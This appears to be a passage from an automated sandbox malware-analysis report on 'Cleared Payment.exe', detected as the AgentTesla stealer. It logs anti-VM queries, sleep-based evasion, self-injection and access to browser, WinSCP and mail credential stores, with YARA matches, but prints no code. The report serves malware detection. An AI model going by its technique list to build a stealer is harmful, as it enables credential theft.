                      Source: C:\Users\user\Desktop\Cleared Payment.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\Cleared Payment.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMemory allocated: 2530000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMemory allocated: 4570000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMemory allocated: 89D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMemory allocated: 99D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMemory allocated: 89D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMemory allocated: 2BC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMemory allocated: 2D80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMemory allocated: 4E80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeWindow / User API: threadDelayed 587Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeWindow / User API: threadDelayed 2999Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 1464Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 5948Thread sleep count: 587 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 5948Thread sleep count: 2999 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -99765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -99656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -99547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -99422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -99313s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -99188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -99078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -98969s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -98844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -98735s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -98610s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -98485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -98360s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -98235s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -98100s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -97985s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe TID: 3196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Cleared Payment.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Cleared Payment.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 99765Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 99547Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 99422Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 99313Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 99188Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 99078Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 98969Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 98844Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 98735Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 98610Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 98485Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 98360Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 98235Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 98100Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 97985Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Cleared Payment.exe, 00000004.00000002.3324266418.00000000010A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMemory written: C:\Users\user\Desktop\Cleared Payment.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess created: C:\Users\user\Desktop\Cleared Payment.exe "C:\Users\user\Desktop\Cleared Payment.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess created: C:\Users\user\Desktop\Cleared Payment.exe "C:\Users\user\Desktop\Cleared Payment.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeQueries volume information: C:\Users\user\Desktop\Cleared Payment.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeQueries volume information: C:\Users\user\Desktop\Cleared Payment.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Cleared Payment.exe.41d12a0.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Cleared Payment.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Cleared Payment.exe.41d12a0.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Cleared Payment.exe.3832698.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3325617856.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3325617856.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Cleared Payment.exe PID: 5140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cleared Payment.exe PID: 2548, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\Cleared Payment.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\Cleared Payment.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\Cleared Payment.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.2.Cleared Payment.exe.41d12a0.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Cleared Payment.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Cleared Payment.exe.41d12a0.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Cleared Payment.exe.3832698.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3325617856.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Cleared Payment.exe PID: 5140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cleared Payment.exe PID: 2548, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Cleared Payment.exe.41d12a0.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Cleared Payment.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Cleared Payment.exe.41d12a0.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Cleared Payment.exe.3832698.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3325617856.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3325617856.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Cleared Payment.exe PID: 5140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cleared Payment.exe PID: 2548, type: MEMORYSTR

